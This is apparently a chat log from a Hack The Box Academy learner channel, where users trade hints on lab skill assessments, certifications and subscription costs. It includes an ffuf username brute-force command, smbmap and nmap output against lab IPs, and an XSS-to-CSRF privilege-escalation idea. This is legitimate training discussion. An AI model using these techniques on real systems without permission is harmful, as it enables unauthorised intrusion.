i guess some things will stick and with practice it will add up, but imo it is kinda not beneficial to try to retain 100% of that information. I feel like it is a better memory usage to recognize patterns and to know where to quickly find the info you need. Or at least that's what i say to myself to reassure me : D

ffuf -w /opt/useful/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.59.199:41739/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"```
Just keeps running without a result
Tried the smaller Seclists user lists also the names one with no results
Checked that it uses the same "Unknown user" response and the data format is  the same.
https://academy.hackthebox.com/module/80/section/772

i've completed the path as well ,except reporting and aen. I just feel bad, not confident at all, kinda burned out... we'll see how that evolves after reviewing the whole course and notes, and more practice.

Thanks for the question. I will say that I learned a lot with the HTB academy. I started almost 3 years ago with other hacking platforms but I never take good notes. Instead in this path I take notes of almost every module with relevant commands and description so now I feel very confident in doing challenges/boxes because I know what to try and what looking for. I give you an example of the last module (AEN) I was able to compromise the AD environment ALMOST blindly, I stuck only on some edge case but I will say 95% I did it without solution. My next step will be Dante Pro Lab always on hackthebox for OSCP preparation

P.S. I work as a penetration tester, and I will say that this path (along with the bug bounty hunter path) helps me a lot in my job, especially the web attacks part and attacking common applications.

If you have some questions dm

by the way if someone has some advice for the OSCP preparation I'm all ears 🫶

Is there a reason I cannot comment on the pro-labs discussions? Dante is not working correctly.

Read and follow #welcome

Machine's duration ran out now.

Hello, I'm having trouble with initial access in the Advanced XSS and CSRF Exploitation skill assessment.

I'm currently attacking the ||/files.php page. Looking at the dialogue "Your personal file storage (Note: Admins are able to access your files for security reasons)", I assumed there might be an admin bot scraping the uploaded files on this page. Trying XSS, I uploaded one text file with Javascript to exploit a CSRF vuln on the user promotion GET endpoint and another file to execute that Javascript from within the webapp to bypass CSP.|| The execution of this JS works from my side if I access the file, but I'm unable to escalate my rights through this vector via XSS -> CSRF.

Also tried sending payloads from exploitserver.htb/exploit the for mutiple endpoints on vulnerablesite.htb but I can't get around the the ||Strict SameSite cookie. To achieve XSS from the upload page.||

Sanity check, am I hyper focused on the wrong thing?

Five hours later the file inclusion skills assesment is done.
Brain is fuzzed after 4 hours of getting nowhere only to realise I had been looking at the info I needed for the intended path for about 3.5 of those hours.

└──╼ $smbmap -H 10.129.203.6 -r GGJ
[+] IP: 10.129.203.6:445    Name: 10.129.203.6                                      
        Disk                                                      Permissions    Comment
    ----                                                      -----------    -------
    GGJ                                                   READ ONLY    
    .\GGJ\*
    dr--r--r--                0 Tue Apr 19 23:33:55 2022    .
    dr--r--r--                0 Mon Apr 18 19:08:30 2022    ..
    fr--r--r--             3381 Tue Apr 19 23:33:03 2022    id_rsa

if i look at this output. Am i mistaken in thinking that id_rsa should be downloadab le?

world has read permissions on it and therefore if i can log on with smbclient. a simple "get id_rsa" should dowlnload the file?

in any case file is not downloadable. going to try a different server

hello guys

I have one question in module API ATTACKS - skill assessment

aaboout the content flag, Is it going to be in file:///flag.txt?

the question gives you the path of the file

I guess my question is.... should i be able to download it or is that part of the assessment

i'm done, thanks

ATTACKING COMMON APPLICATIONS-Other Notable Applicatiｏｎ

ｉ　ａｍ　ｓｔｕｃｋ　ａｔ　ｔｈｅ　２ｎｄ　ｑｕｅｓｔｉｏｎ

i open the url but its a 404 page i don't know what to do

where can i find the Portswigger Labs course

someone recommended me the course last week and i wanted to search it but didnt find it

On the website of Portswigger

https://letmegooglethat.com/?q=portswigger+labs+course

oh😅
is it for free?

Oh man

Have a look 🙂

👁️

well give me a sec

looks like it is for free 🙂

Htb offer students discount? Or any other discount

Yes, check https://academy.hackthebox.com/billing/monthly-billing

⚡ 👈

"types fast"

I am asking about certificate discount

I'm afraid not, to my knowledge

Means no?

Currently only the Academy Student Subscription is available. As far as I know, there are no discounts for students for anything else

im doing the skill assessment of the session attacks

i dont wanna write something that will spoil anyone

Alright, so can anyone tell me if i pick cpts as my first certification it will be right decision?
I have some knowledge but just a some basic level.
I want to be a pentester

I don't believe there is a right or wrong decision, depends on what you want to get out of it

I want to clear it as my first certificate and step in to industry level pentesting.

Can u please tell this.

...

CPTS is certainly a very good choice for knowledge. If it is about having a certificate that is often asked for by HR, then OSCP might be the better choice.

Tons of comparisons on youtube. You can do some research there before committing

Nope i want skills

I want a good knowledge

https://www.youtube.com/live/wwmCHeYd1I4

https://youtu.be/dRW1Gxmu__Q

https://youtu.be/UN5fTQtlKCc

https://www.youtube.com/watch?v=-5s2R0Mldgw

https://www.youtube.com/watch?v=LbW1hbn2y2I

https://www.youtube.com/watch?v=rqlUajy6c50

https://www.brunorochamoura.com/posts/road-to-cpts/

https://eatthebuffet.github.io/posts/CPTS-or-OSCP/

https://medium.com/@0xP/why-htbs-cpts-exam-will-become-the-standard-for-modern-day-penetration-testers-34668fde209f

https://0xfa7e.github.io/post/cpts-vs-oscp/

https://xre0us.io/posts/cpts-oscp-and-you/

https://notateamserver.xyz/cpts-review/

https://cyberskies.org/posts/CPTS/

Because some people state on YouTube that do PNPT before doing CPTS.

But i directly want to do CPTS

Then do it

Ok let's have a beast mode on hehe

Bunny can you tell me the cpts whole package which contain module + cert
That is for lifetime access to module or for just cert.

• if i buy student subscription will i get access to all modules necessary to pass cpts?

It teach from beginner to advance?

can someone help me figure out something in private regarding the skill assessment of session hijacking?

Yes, with this subscription you have access to all modules up to Tier II

how can i get cubes

By purchase or subscription

you can get cubes by purchasing them directly, from one of the monthly subscriptions (except student sub), or from referrals

Send me a DM

if you have an annual sub, completing modules will give you cubes

hmm i understand 🙂

ty

Did u manage to solve WSUS part?

Hello there! I found a broken box in the module "Windows Privilege Escalation" of the academy. Where can I report it???

Likely not broken but #1234357888114364508

Thank you @fathom pendant!

any nudge would be greatly appreciated for this. Been stuck on the assessment for a few days.

does the course "introduction to web applications" reward more than 10 cubes?

Module: Attacking Common Services
Easy Assessement; how to approach it - fuzzed domain --> no promising results; ports ftp, smtp, mysql all need creds --> bruteforcing?

It's a tier 0 module yeah?

yea

Smtp might contain a user

Then it only gives back 10

All other module tiers give 20% back

are there any tier 0 module that gives back more than 10?

No

i want to get the tier 2 XSS module course but i dont have enough cubes 😦

Then buy a sub

¯_(ツ)_/¯

Plat monthly is $68 for 1k cubes/month

is there no other way? because i dont know if i want to spend 5$ yet...tbh if its possible im trying to avoid it, at leas t before i spend money i want to check if i even have the patience and can succeed in this.. 🙂

You can buy cubes outright, but at a significantly higher cost

Nope

No other way to gain cubes

well thats a bummer

I mean, htb wouldn't make money that way

¯_(ツ)_/¯

And comparatively, it's on the cheaper end of learning platforms

yea true 🙂 , just checked if perhaps there was a way but you are right its true that they give us a lot of courses with good information

And the t0 modules build solid foundations

then ofc they should receive a certain profit

The t0 modules would be considered the "free" tier

yea true.... although i do have the foundation so i know like the stuff they teach in the foundation

I think I need a hint on the Attacking Common Services. FTP section

I have tried bruteforcing services I have found with the username and password list in the resources

Did you try anonymous?

is there a prefered user list to be used from Seclists for getting valid username? - tool uses smtp-user-enum?

The only service you should attack on that section is FTP

There doesn't seem to be an ftp service running on the box

The provided list from the resources button

Then restart the box

As you can't attack FTP if FTP isn't running

lol..

i guess... :). I thought maybe there was an ftp server behind the main machine

Or if it is running, you might need to specify the alt port

It's not

or ftp running on localhost

hmmm

All the stuff in this module (not skill assessment) should be outward facing

ok thank you for th hint

Are you only scanning for port 21?

└──╼ $sudo nmap -p- 10.129.203.6

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 00:09 CEST
Nmap scan report for 10.129.203.6
Host is up (0.085s latency).
Not shown: 63906 closed tcp ports (reset), 1625 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Reset box

ok thnks

The ftp service is on an alt port (indicated by Q1)

yh i figured

but i guessed that I had scanned all ports

You did -p- yeah?

mind u i didn't scan for udp ports but I was expecting ftp to be using tcp

yeah i did -p-,

It'll be tcp

mind u there are implementations of ftp over udp as a transport

Ftp doesn't use udp in this instance

Assume some level of Defaults

ok thanks for the hint

box is reset

let's see how we go 🙂

Iirc this one can take a few resets sometimes

hmm

think u r right

gonna switch regions too

As a note, when using ftp on an alt port the syntax is
ftp [ip] [port]

yep thanks

i just need to find the service first 🙂

ahahaha

👍

found it

all done and moved on from attacking ftp service

That's a bit furustrating though

Might be worth having a tip saying to reset machine if don't find ftp service

python3 -m http.server --directory /home/kali/file.txt
Trying to upload a file on the python webserver I just created, But im recieving error messages

Network services module, linux fundamentals

You don't specify the file. You're setting up a server. If you only want certain files available then try setting up a /tmp/www folder, open a terminal there, then run python3 -m http.server

Everything in that tmp folder will br available for download, so put whatever files you want available

Hi everyone! Please i need help with a question with DACL 1, The question Is: "Using Pedro's account, submit the password of Moly's account.". I dont understand The part 'using Pedros account' From the Kerberoasting attack I sent Moly's password, which is Passw@#$...etc, but what I don't understand is that I don't speak English very well, it's the part about: sending from Pedro's account. Can you please help me with that, which means sending from Pedro's account. Thank you so much.

no

I'm stuck tried everything but for some reason I can't get a revshell on backup server

So upon server creation every folder in the directory I was in will be avaliable on the server?

It's a very annoying skill assessment 😰 I was able to get a PowerShell revshell but I had to be very, very, very patient for the payload to execute. I didn't do anything special not mentioned in the module except waiting a long time